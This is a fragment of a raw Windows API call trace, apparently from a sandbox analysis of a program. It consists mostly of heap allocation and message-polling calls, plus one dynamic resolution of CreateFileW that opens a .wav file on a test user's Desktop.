RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0161.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0161.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0161.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0161.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0161.400] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0161.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0161.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0161.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0161.400] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0161.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0161.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0161.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0161.401] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0161.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0161.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0161.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0161.401] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0161.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0161.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0161.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0161.401] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0161.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0161.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0161.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0161.401] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0161.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0161.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0161.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0161.401] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0161.401] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0161.401] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.401] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.401] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0161.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0161.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0161.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0161.402] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0161.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0161.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0161.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0161.402] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0161.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0161.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0161.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0161.402] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0161.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0161.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0161.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0161.402] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0161.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0161.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0161.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0161.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0161.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0161.402] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0161.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0161.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0161.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0161.403] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0161.403] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0161.403] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0161.403] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0161.403] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0161.403] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd630 [0161.403] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x9bd630, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0161.403] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gJmnMJqziFMsIe_.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gjmnmjqzifmsie_.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0161.404] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0161.404] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0161.404] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0161.404] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0161.404] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0161.404] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0161.404] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0161.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0161.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0161.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0161.404] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0161.404] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0161.404] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0161.404] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0161.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0161.404] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c88 [0161.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa6d008 | out: hHeap=0x8a0000) returned 1 [0161.404] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0161.404] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0161.404] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0161.404] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0161.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0161.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0161.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0161.404] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0161.404] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0161.404] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0161.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0161.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0161.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0161.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0161.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0161.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0161.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0161.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0161.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0161.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0161.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0161.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0161.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0161.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0161.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0161.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0161.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0161.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0161.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0161.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0161.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0161.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0161.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0161.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0161.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0161.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0161.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0161.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0161.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0161.406] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0161.406] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0161.406] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0161.406] FreeLibrary (hLibModule=0x75990000) returned 1 [0161.406] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0161.406] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0161.406] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0161.406] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0161.406] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0161.406] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0161.406] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0161.406] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0161.406] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0161.406] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0161.406] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0161.406] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0161.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0161.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0161.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0161.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0161.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0161.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0161.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0161.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0161.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0161.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0161.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0161.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0161.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0161.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0161.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0161.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0161.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0161.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0161.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0161.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0161.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0161.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0161.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0161.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0161.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0161.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0161.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c00 | out: hHeap=0x8a0000) returned 1 [0161.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0161.407] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0161.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0161.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0161.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0161.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0161.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0161.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0161.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0161.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0161.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0161.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0161.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d460 [0161.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0161.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0161.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0161.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0161.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0161.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0161.408] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0161.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0161.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0161.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0161.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0161.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0161.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0161.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0161.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0161.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0161.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0161.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0161.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0161.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0161.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0161.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0161.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0161.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0161.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0161.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0161.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0161.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0161.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0161.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0161.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0161.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0161.409] HeapFree 